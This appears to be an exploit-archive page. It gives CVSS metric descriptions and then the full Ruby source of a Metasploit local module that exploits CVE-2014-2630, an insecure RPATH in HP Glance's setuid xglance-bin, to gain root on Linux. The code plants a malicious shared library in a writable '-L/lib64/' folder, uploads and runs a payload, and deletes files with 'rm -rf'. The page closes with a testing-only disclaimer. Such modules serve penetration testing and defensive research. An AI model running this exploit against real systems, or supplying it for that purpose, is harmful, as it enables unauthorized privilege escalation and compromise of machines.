The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).
Attack Complexity
Low
AC
The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required
Low
PR
The attacker requires privileges that provide basic capabilities that are typically limited to settings and resources owned by a single low-privileged user. Alternatively, an attacker with Low privileges has the ability to access only non-sensitive resources.
User Interaction
None
UI
The vulnerable system can be exploited without interaction from any human user, other than the attacker. Examples include: a remote attacker is able to send packets to a target system a locally authenticated attacker executes code to elevate privileges
Scope
Unchanged
S
An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances.
Confidentiality
High
C
There is total information disclosure, resulting in all data on the system being revealed to the attacker, or there is a possibility of the attacker gaining control over confidential data.
Integrity
High
I
There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the attacker being able to modify any file on the target system.
Availability
High
A
There is a total shutdown of the affected resource. The attacker can deny access to the system or data, potentially causing significant loss to the organization.
Below is a copy: HP Performance Monitoring xglance Privilege Escalation
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = GreatRanking
include Msf::Post::Linux::Priv
include Msf::Post::Linux::System
include Msf::Post::Linux::Compile
include Msf::Post::File
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(
update_info(
info,
'Name' => 'HP Performance Monitoring xglance Priv Esc',
'Description' => %q{
This exploit takes advantage of xglance-bin, part of
HP's Glance (or Performance Monitoring) version 11 'and subsequent'
, which was compiled with an insecure RPATH option. The RPATH includes
a relative path to -L/lib64/ which can be controlled by a user.
Creating libraries in this location will result in an
escalation of privileges to root.
},
'License' => MSF_LICENSE,
'Author' =>
[
'h00die', # msf module
'Tim Brown', # original finding
'Robert Jaroszuk', # exploit
'Marco Ortisi', # exploit
],
'Platform' => [ 'linux' ],
'Arch' => [ ARCH_X86, ARCH_X64 ],
'SessionTypes' => [ 'shell', 'meterpreter' ],
'Targets' =>
[
[ 'Automatic', {} ],
[ 'Linux x86', { 'Arch' => ARCH_X86 } ],
[ 'Linux x64', { 'Arch' => ARCH_X64 } ]
],
'Privileged' => true,
'References' =>
[
[ 'EDB', '48000' ],
[ 'URL', 'https://seclists.org/fulldisclosure/2014/Nov/55' ], # permissions, original finding
[ 'URL', 'https://www.redtimmy.com/linux-hacking/perf-exploiter/' ], # exploit
[ 'URL', 'https://github.com/redtimmy/perf-exploiter' ],
[ 'PACKETSTORM', '156206' ],
[ 'URL', 'https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2630/' ],
[ 'CVE', '2014-2630' ]
],
'DisclosureDate' => 'Nov 19 2014',
'DefaultTarget' => 0
)
)
register_options [
OptString.new('GLANCE_PATH', [ true, 'Path to xglance-bin', '/opt/perf/bin/xglance-bin' ])
]
register_advanced_options [
OptBool.new('ForceExploit', [ false, 'Override check result', false ]),
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
]
end
# Simplify pulling the writable directory variable
def base_dir
datastore['WritableDir'].to_s
end
def exploit_folder
"#{base_dir}/-L/lib64/"
end
def glance_path
datastore['GLANCE_PATH'].to_s
end
# Pull the exploit binary or file (.c typically) from our system
def exploit_data(file)
::File.binread ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-2630', file)
end
def find_libs
libs = cmd_exec "ldd #{glance_path} | grep libX"
%r{(?<lib>libX.+\.so\.\d) => -L/lib64} =~ libs
return nil if lib.nil?
lib
end
def check
unless setuid? glance_path
vprint_error "#{glance_path} not found on system"
return CheckCode::Safe
end
lib = find_libs
if lib.nil?
vprint_error 'Patched xglance-bin, not linked to -L/lib64/'
return CheckCode::Safe
end
vprint_good "xglance-bin found, and linked to vulnerable relative path -L/lib64/ through #{lib}"
CheckCode::Appears
end
def exploit
unless check == CheckCode::Appears
unless datastore['ForceExploit']
fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
end
print_warning 'Target does not appear to be vulnerable'
end
if is_root?
unless datastore['ForceExploit']
fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override'
end
end
unless writable? base_dir
fail_with Failure::BadConfig, "#{base_dir} is not writable"
end
# delete exploit folder in case a previous attempt failed
vprint_status("Deleting exploit folder: #{base_dir}/-L")
rm_cmd = "rm -rf \"#{base_dir}/-L\""
cmd_exec(rm_cmd)
# make folder
vprint_status("Creating exploit folder: #{exploit_folder}")
cmd_exec "mkdir -p #{exploit_folder}"
register_dir_for_cleanup "#{base_dir}/-L"
# drop our .so on the system that calls our payload
# we need gcc to compile instead of metasm since metasm
# removes unused variables, which we need to keep xglance-bin
# from breaking and not launching our exploit
so_file = "#{exploit_folder}libXm.so.3"
if live_compile?
vprint_status 'Live compiling exploit on system...'
payload_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"
code = exploit_data('CVE-2014-2630.c')
code.sub!('#{payload_path}', payload_path) # inject our payload path
upload_and_compile so_file, code, '-fPIC -shared -static-libgcc'
rm_f "#{so_file}.c"
else
payload_path = '/tmp/.u4aLoiq'
vprint_status 'Dropping pre-compiled exploit on system...'
upload_and_chmodx so_file, exploit_data('libXm.so.3')
end
# Upload payload executable
vprint_status 'uploading payload'
upload_and_chmodx payload_path, generate_payload_exe
# link so files to exploit vuln
lib = find_libs
# just to be safe, Xt and Xp were in the original exploit
# our mock binary is also exploitsable through libXmu.so.6
# unsure about the real binary
cd exploit_folder
['libXp.so.6', 'libXt.so.6', 'libXmu.so.6', lib].each do |l|
cmd_exec "ln -s libXm.so.3 #{l}"
end
# Launch exploit
print_status 'Launching xglance-bin...'
cd base_dir
output = cmd_exec glance_path
output.each_line { |line| vprint_status line.chomp }
print_warning("Manual cleanup of #{exploit_folder} may be required")
end
end
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum